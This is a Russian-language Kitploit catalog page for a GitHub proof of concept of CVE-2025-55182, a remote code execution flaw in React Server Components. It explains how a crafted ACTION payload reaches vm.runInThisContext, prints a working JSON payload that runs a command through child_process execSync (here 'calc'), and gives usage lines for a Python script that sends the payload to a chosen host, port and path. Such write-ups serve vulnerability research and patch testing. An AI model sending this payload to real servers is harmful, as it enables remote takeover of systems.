Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182POC — Эксплойт для проверки концепции CVE-2025-55182, демонстрирующий удаленное выполнение кода в React Server Components через вредоносные полезные нагрузки ACTION и инъекцию vm.runInThisContext. | Kitploit
Инструменты/GitHubGitHub/sudo-yangziran/cve-2025-55182poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubsudo-yangziran/cve-2025-55182poc

CVE-2025-55182POC

Эксплойт для проверки концепции CVE-2025-55182, демонстрирующий удаленное выполнение кода в React Server Components через вредоносные полезные нагрузки ACTION и инъекцию vm.runInThisContext.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
28 месяцев назадЕщё не проверено

CVE-2025-55182 React Server Components RCE POC

Данный проект представляет CVE-2025-55182 - React Server Components (RSC) RCE Proof of Concept, демонстрирующий возможность удаленного выполнения кода в определенных условиях с помощью vm.runInThisContext и злонамеренного ACTION payload.

  • Сторона Python: автоматическая отправка вредоносного ACTION payload и анализ ответа

⚠ Описание уязвимости (CVE-2025-55182)

ACTION payload в React Server Components при определенных условиях:

  • десериализуется в JS-объект
  • передается для выполнения в vm.runInThisContext
  • автоматически внедряется в server actions

Злоумышленник может сформировать такой payload:

root@kitploit:~
{
  "$ACTION_REF_0": "",
  "$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
ПараметрОбязательныйПо умолчаниюОписание
--hostДанетIP-адрес или домен целевого сервера. Например: 127.0.0.1, 192.168.1.10, example.com
--portНет80Порт HTTP-сервера цели, например: 3003
--pathДанетПуть маршрута, подверженного уязвимости, например: /feedback, /action
--httpsНетFalseИспользовать HTTPS для отправки payload (по умолчанию HTTP)

python a.py --host <целевой IP> --port <порт> --path <путь URL>

python a.py --host 127.0.0.1 --port 3003 --path /feedback

Скачать инструмент